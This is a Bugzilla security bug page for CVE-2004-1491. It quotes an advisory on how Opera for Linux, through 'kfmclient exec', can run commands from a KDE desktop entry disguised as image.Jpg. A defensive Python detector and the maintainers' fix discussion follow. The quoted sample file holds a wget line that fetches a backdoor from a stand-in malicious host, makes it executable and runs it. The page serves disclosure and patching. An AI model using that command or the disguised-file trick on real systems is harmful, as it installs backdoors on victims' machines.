Bugzilla – Bug 64218
VUL-0: CVE-2004-1491: opera - trick user into running arbitrary commands
Last modified: 2021-10-19 13:55:36 UTC
We received the following report via full-disclosure. The issue is public.

Date: Mon, 13 Dec 2004 18:05:14 +0000
From: Giovanni Delvecchio <badpenguin79@hotmail.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclient
Reply-To: badpenguin@zone-h.org

Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org
Tested version: Opera 7.54 Linux version with KDE 3.2.3
Original advisory: http://zone-h.org/en/advisories/read/id=6503/

Problem:
=======
Opera for Linux uses "kfmclient exec" as the "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system. Indeed, the command "kfmclient exec" could be used to open a "KDE Desktop Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:
________________________________
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________

Possible method of Exploitation
=========================
This method of exploitation requires that a particular file name extension be used. If page.Htm is used as the file name and "kfmclient exec page.Htm" is opened, the command in the "Exec=" entry will be executed. Instead, if "page.htm" is used as the file name, it will not be opened like a "KDE desktop entry" but will be viewed in Konqueror. It works also with Jpg, Gif etc., but not with the jpg, gif extensions, since the "system" is case sensitive.

Attack scenario:
1- A user clicks on a link which requests http://malicious_server/image.Jpg
2- malicious_server responds with an unknown Content-Type field, for example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window.
3- If the user chooses "Open" to view image.Jpg, it will be opened by the "kfmclient exec" command, since kfmclient is the "Default Application".
4- image.Jpg is a KDE desktop entry:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
Note: \t is a horizontal tab.

In this case a backdoor will be downloaded on the victim's computer and executed.

Solution:
========
Disable "kfmclient exec" as the default application.
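A defender-side check for the masquerade the advisory describes, added here as an example and not part of the report or of the Opera package: it parses a saved file as a KDE desktop entry and flags one whose extension claims an image or HTML document (the .Jpg / .Htm case variant included). Function names and the sample inputs are my own construction.

```python
import re

# Extensions a user expects to open as a picture or document; compared
# case-insensitively because the case variant (.Jpg, .Htm) is the trick.
DOCUMENT_EXTENSIONS = {"jpg", "jpeg", "gif", "png", "htm", "html", "txt"}


def parse_desktop_entry(text):
    """Return {section: {key: value}} for an INI-style KDE desktop entry;
    blank lines and '#' comments are skipped, keys before a header ignored."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def check_saved_file(filename, content):
    """Flag a file whose name claims an image/document but whose body is a
    desktop entry with an Exec= command (what "kfmclient exec" would run).
    Returns (suspicious, exec_command, case_variant_extension)."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    case_variant = ext != ext.lower()
    if ext.lower() not in DOCUMENT_EXTENSIONS:
        return False, None, case_variant
    entries = parse_desktop_entry(content)
    for section in ("KDE Desktop Entry", "Desktop Entry"):
        command = entries.get(section, {}).get("Exec")
        if command:
            # The advisory separates arguments with tabs; normalise them so
            # the reported command reads plainly.
            return True, command.replace("\t", " "), case_variant
    return False, None, case_variant


# Constructed samples (not the advisory's payload).
SAMPLE_DESKTOP_ENTRY = """# KDE Config File
[KDE Desktop Entry]
Exec=/usr/bin/xmessage\tconstructed-sample
Type=Application
Terminal=0
"""
SAMPLE_JPEG = "\xff\xd8\xff\xe0\x00\x10JFIF constructed image bytes"
```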
I'll talk to our Opera contact
Waiting for answer from "Espen Sand" <espen@opera.com>
any news? Did you check whether the report is valid at all?
It is confirmed and I still got no reply from Opera; I'll go and find a solution myself.
NEEDINFO is wrong as it refers to the reporter and I cannot provide the information you need.
You may set the default file handler in /usr/share/opera/ini/filehandler.ini, or per user (created on first run) in ~/.opera/filehandler.ini (aka $OPERA_DIR/filehandler.ini)
Fixed package submitted to stable
Lukas, please submit packages for older distributions too. The "VUL-0" tag means that all supported versions need an update. Thanks.
OK, down to what version?
8.2
CAN-2004-1491 SM-Tracker-578
The 8.2 version is still missing... patchinfo is missing
please reassign to security-team when done. we'll submit patchinfo files then.
Reassigning, 8.2 submitted
fixed packages released.
CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)